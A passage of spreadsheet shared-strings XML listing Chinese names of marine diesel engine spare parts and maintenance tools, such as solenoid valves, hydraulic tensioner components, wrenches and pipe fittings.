        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>加热电缆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电加热器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开孔</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>稳压器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测量放大器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装插头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泄漏探测器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>流量开关</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承塞尺</t>
    </r>
  </si>
  <si>
    <r>
      <t>MAN</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器的传感器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵转速计</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>插头</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>显示</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>数字参考单元</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>二极管阵列</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接线箱</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动和慢转箱</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保险丝座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>放大继电器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>延迟触点</t>
    </r>
  </si>
  <si>
    <r>
      <t>PI</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调温器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>继电器附件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>氯丁</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>二烯</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>)</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>橡胶按钮</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>位置开关</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>插孔</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电缆绑带</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保险丝零件</t>
    </r>
  </si>
  <si>
    <r>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>位</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通电磁阀，常闭</t>
    </r>
  </si>
  <si>
    <r>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>位</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>3</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通电磁阀，常闭</t>
    </r>
  </si>
  <si>
    <r>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>位</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>3</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通电磁阀，常开</t>
    </r>
  </si>
  <si>
    <r>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>位</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>5</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通电磁阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>感应传感器的继电器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>双六角管钳</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特殊扳手</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气动管钳</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外六角管钳</t>
    </r>
  </si>
  <si>
    <r>
      <t>90</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>度偏移管钳</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特殊开槽扳手</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开口冲击扳手</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特殊开口扳手</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>环形扳手</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>偏移冲击扳手</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冲击板手头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通用接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带槽板手头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮扳手</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺塞螺丝刀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拔出工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带钳夹的拔出工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压拉伸器（顶盖）</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压拉伸器，支架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压拉伸器（工具）</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压拉伸器（牵引螺母）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压拉伸器（外螺母）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压拉伸器（内螺母）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测试块</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导槽</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧秤</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承盖钢丝导座</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>槽轮叉形架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具平台支撑</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>边铣刀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带气缸轴的边铣刀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锥形心轴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>磨石</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>翼片砂轮</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自攻螺丝，</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冲压螺母</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>平行钻孔</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钻孔清洗</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>刀具伸长</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带环的钻孔衬套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>切割工具导向</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具附件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钻孔，</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Morse</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锥度</t>
    </r>
  </si>
  <si>
    <r>
      <t>Morse</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锥度</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <t>Morse</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锥度钻头</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>刮刀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>砂轮刷子</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扩管器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>塞尺备件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>桥规，部件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内径表</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拧紧角度样板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滚压直管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>非金属直管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>非金属弯管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢丝软管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外螺纹直管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内螺纹直管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机加工直管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>个法兰的弯管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>有接头的弯管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特殊弯管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内螺纹弯管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
